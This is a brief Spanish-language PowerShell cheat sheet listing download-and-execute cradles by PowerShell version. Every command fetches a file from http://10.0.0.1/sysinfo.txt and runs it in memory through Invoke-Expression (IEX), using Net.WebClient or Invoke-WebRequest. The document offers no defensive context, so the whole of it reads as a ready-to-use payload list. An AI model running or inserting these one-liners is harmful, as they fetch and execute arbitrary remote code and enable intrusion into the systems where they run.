# Ejemplos de uso Invoke-Expression WebRequest

# Versiones Powershell
Powershell 1.0 – Windows Vista / 2008
Powershell 2.0 – Windows 7 / 2008 R2
Powershell 3.0 – Windows 8 / 2012
Powershell 4.0 – Windows 8.1 / 2012 R2
Powershell 5.0 – Windows 10

# Powershell v1.0/v2.0
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/sysinfo.txt')

# Powershell v3.0 y superiores
Invoke-WebRequest -Uri 'http://10.0.0.1/sysinfo.txt' -UseBasicParsing | IEX
IEX (Invoke-WebRequest -Uri 'http://10.0.0.1/sysinfo.txt' -UseBasicParsing)
Invoke-WebRequest -Uri 'http://10.0.0.1/sysinfo.txt' -UseBasicParsing | Select-Object Content | IEX
IEX (Invoke-WebRequest -Uri 'http://10.0.0.1/sysinfo.txt' -UseBasicParsing).Content
